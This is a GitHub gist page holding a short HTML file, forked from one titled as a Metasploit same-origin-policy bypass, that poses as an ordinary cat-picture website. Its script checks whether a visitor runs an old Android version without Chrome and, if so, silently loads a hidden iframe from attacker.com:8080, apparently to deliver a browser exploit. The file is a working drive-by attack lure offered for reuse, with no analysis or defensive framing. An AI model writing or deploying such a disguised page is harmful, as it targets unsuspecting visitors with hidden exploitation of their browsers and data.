Skip to content

Instantly share code, notes, and snippets.

@yehgdotnet
Forked from joswr1ght/MetasploitSOPBypass.html
Created February 28, 2018 13:26
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save yehgdotnet/4b8d37c0cc8bdafcff8dac9cc382bf7d to your computer and use it in GitHub Desktop.
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
This is a normal website. Look at these pictures of cats...
<script>
var spec = new Spec();
if (spec.isDeviceDetected() && spec.getOS() == "Android"
&& spec.getBrowser != "Chrome"
&& parseFloat(spec.getOSVersion()) < 4.4) {
var iframe = document.createElement('iframe');
iframe.style.display="none";
iframe.src = "http://attacker.com:8080";
document.body.appendChild(iframe);
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment